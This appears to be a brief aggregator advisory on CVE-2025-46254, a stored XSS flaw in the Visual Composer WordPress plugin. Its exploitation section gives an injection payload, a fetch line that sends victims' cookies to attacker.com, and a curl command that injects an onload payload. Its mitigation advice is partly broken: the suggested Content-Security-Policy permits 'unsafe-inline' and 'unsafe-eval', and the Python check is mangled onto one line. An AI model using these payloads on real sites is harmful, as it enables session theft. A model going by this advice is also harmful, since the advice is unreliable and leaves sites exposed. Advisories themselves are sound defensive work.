How CVE-2025-46254 Works
CVE-2025-46254 is a Stored Cross-Site Scripting (XSS) vulnerability in Visual Composer Website Builder (versions up to 45.10.0). The flaw arises from improper input sanitization during web page generation, allowing attackers to inject malicious JavaScript payloads into stored content. When a victim accesses a compromised page, the script executes in their browser, enabling session hijacking, defacement, or malware delivery. The attack persists due to lack of output encoding in dynamic content rendering.
DailyCVE Form:
Platform: WordPress
Version: ≤ 45.10.0
Vulnerability: Stored XSS
Severity: Critical
Date: 04/30/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
<script>alert(document.cookie)</script>
Inserted via unprotected input fields (e.g., post editor).
2. Exfiltrate Sessions:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
3. Automated Testing:
curl -X POST -d "content=<svg/onload=alert(1)>" http://target/wp-admin/admin-ajax.php
Mitigation:
1. Patch: Upgrade to Visual Composer > 45.10.0.
2. WAF Rules:
location ~ .php$ {
modsecurity_rules 'SecRule ARGS "@rx <script" "id:1001,deny,status:403"';
}
3. Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval';
4. Sanitization:
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
5. Log Monitoring:
grep -r "eval(" /var/www/html/wp-content/plugins/visual-composer/
6. Disable Unused Features:
add_filter('vc_user_access', '__return_false');
7. Exploit Detection:
import requests response = requests.get(target_url) assert "<script>" not in response.text, "XSS Detected"
8. Backup Restoration:
wp db import clean_backup.sql
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
